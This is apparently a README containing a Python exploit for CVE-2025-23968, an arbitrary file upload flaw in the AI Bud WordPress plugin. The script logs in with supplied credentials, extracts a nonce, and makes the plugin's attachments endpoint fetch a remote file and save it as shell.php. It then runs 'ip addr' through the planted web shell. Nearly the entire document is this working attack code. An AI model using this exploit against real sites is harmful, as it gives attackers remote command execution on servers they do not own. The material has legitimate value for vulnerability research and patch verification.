README.md
Rendering markdown...
# AI Bud – AI Content Generator, AI Chatbot, ChatGPT, Gemini, GPT-4o
# Date: 06/03/2025
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage: https://wpcenter.io/
# Version: <= 1.8.5
# Tested on: 1.8.5
# CVE : CVE-2025-23968
import re
import json
import urllib3
import requests
import argparse
import urllib.parse
from datetime import datetime
now = datetime.now()
def extract_nonce(text):
pattern = r'<script id="ai_buddy_admin_scripts-js-extra">.*?var ai_buddy_localized_data = (.*?);\s*</script>'
match = re.search(pattern, text, re.DOTALL)
if not match:
return None
try:
data_json = match.group(1)
parsed = json.loads(data_json)
return parsed["ai_buddy_image_post_attachment"]["nonce"]
except (json.JSONDecodeError, KeyError):
return None
def wp_login(victim_url: str, username: str, password: str):
with requests.Session() as s:
headers1 = { 'Cookie':'wordpress_test_cookie=WP Cookie check' }
datas={
'log':username, 'pwd':password, 'wp-submit':'Log In',
'redirect_to':f"{victim_url}/wp-admin", 'testcookie':'1'
}
s.post(f"{victim_url}/wp-login.php", headers=headers1, data=datas, verify=False)
return(s)
def main():
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Parse command line arguments
parser = argparse.ArgumentParser(description="CVE-2025-23968: An exploit...")
parser.add_argument("victim_url", help="Target url or ip address.")
parser.add_argument("username", help="The username for the WordPress instance.")
parser.add_argument("password", help="The password for the WordPress instance.")
args = parser.parse_args()
# Log into wprdpress and use this session for the requests.
print(f"Logging into: {args.victim_url}/wp-admin")
wp_session = wp_login(args.victim_url,args.username,args.password)
##################################################################################################################################################
# Grab and prase the HTML for the nonce.
##################################################################################################################################################
print("Extracting nonce values...")
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36'}
r = wp_session.get(f"{args.victim_url}/wp-admin/tools.php", headers=headers, verify=False)
da_nonce = extract_nonce(r.text)
##################################################################################################################################################
# Upload the malicious file.
##################################################################################################################################################
print("Uploading web shell: shell.php")
headers = {
"X-Wp-Nonce": da_nonce,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36",
"Content-Type": "application/json; charset=UTF-8"
}
payload = {
"title": "hack",
"caption": "the",
"alt": "planet",
"description": "Hack the Planet!",
"url": "https://raw.githubusercontent.com/d0n601/d0n601/refs/heads/master/test.jpg",
"filename": "shell.php"
}
r = wp_session.post(f"{args.victim_url}/wp-json/ai-buddy/v1/wp/attachments", headers=headers, json=payload, verify=False)
##################################################################################################################################################
# Test Commands
##################################################################################################################################################
print("Executing test command: ip addr")
r = requests.get(
f"{args.victim_url}/wp-content/uploads/{now.strftime("%Y")}/{now.strftime("%m")}/shell.php?cmd=ip addr",
verify=False
)
print(r.text)
if __name__ == "__main__":
main()